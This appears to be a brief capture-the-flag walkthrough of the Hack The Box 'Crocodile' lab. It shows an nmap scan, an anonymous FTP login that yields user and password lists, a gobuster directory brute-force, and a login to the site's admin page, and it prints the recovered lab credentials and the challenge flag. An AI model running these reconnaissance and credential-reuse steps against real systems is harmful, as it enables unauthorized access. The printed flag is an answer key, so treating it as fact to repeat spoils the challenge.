[HTB] Crocodile (Starting Point)

ip

10.129.53.68

nmap

nmap -sC -sV 10.129.53.68                     
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-17 00:17 EDT
Nmap scan report for 10.129.53.68
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.16.17
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
|_-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Smash - Bootstrap Business Template
Service Info: OS: Unix

ftp

ftp 10.129.53.68
Connected to 10.129.53.68.
220 (vsFTPd 3.0.3)
Name (10.129.53.68:bender): anonymous
230 Login successful.

Used ftp Anonymous login to find 2 files,

dir

get allowed.userlist
get allowed.userlist.passwd

-allowed userlist- aron pwnmeow egotisticalsw admin

-allowed password userlist- root Supersecretpassword1 @BaASD&9032123sADS rKXM59ESxesUFHAd

gobuster

gobuster dir -u http://10.129.53.68 -w /usr/share/wordlists/dirb/big.txt -t 64 -x .php,.txt,.html

=============================================================== /.htaccess (Status: 403) [Size: 277] /.htaccess.php (Status: 403) [Size: 277] /.htaccess.txt (Status: 403) [Size: 277] /.htaccess.html (Status: 403) [Size: 277] /.htpasswd.html (Status: 403) [Size: 277] /.htpasswd (Status: 403) [Size: 277] /.htpasswd.php (Status: 403) [Size: 277] /.htpasswd.txt (Status: 403) [Size: 277] /assets (Status: 301) [Size: 313] [–> http://10.129.53.68/assets/] /config.php (Status: 200) [Size: 0]
/css (Status: 301) [Size: 310] [–> http://10.129.53.68/css/]
/dashboard (Status: 301) [Size: 316] [–> http://10.129.53.68/dashboard/] /fonts (Status: 301) [Size: 312] [–> http://10.129.53.68/fonts/]
/index.html (Status: 200) [Size: 58565]
/js (Status: 301) [Size: 309] [–> http://10.129.53.68/js/]
/login.php (Status: 200) [Size: 1577]
/logout.php (Status: 302) [Size: 0] [–> login.php]
/server-status (Status: 403) [Size: 277]

used /login.php and the username/passwords from previous files.

user: admin passwd: rKXM59ESxesUFHAd

Received flag after logging in. flag: c7110277ac44d78b6a9fff2232434d16